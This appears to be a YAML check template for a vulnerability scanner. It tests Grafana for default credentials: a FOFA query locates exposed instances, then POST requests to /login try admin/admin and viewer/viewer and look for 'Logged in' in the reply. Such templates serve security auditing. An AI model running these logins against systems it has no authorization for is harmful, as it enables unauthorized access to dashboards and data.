product: Grafana
vName: Grafana 默认密码
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: Grafana默认账户密码
version: ''
note: ''
search:
  FOFA: app="Grafana"
protocol: http
link: http://www.mobiletrain.org/about/BBS/256000.html
fix:
  - 更改默认密码
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /login
      json:
        user: admin
        password: admin
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - message
              - Logged in
            logic: and
  - exp:
      method: post
      follow: false
      path: /login
      json:
        user: viewer
        password: viewer
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - message
              - Logged in
            logic: and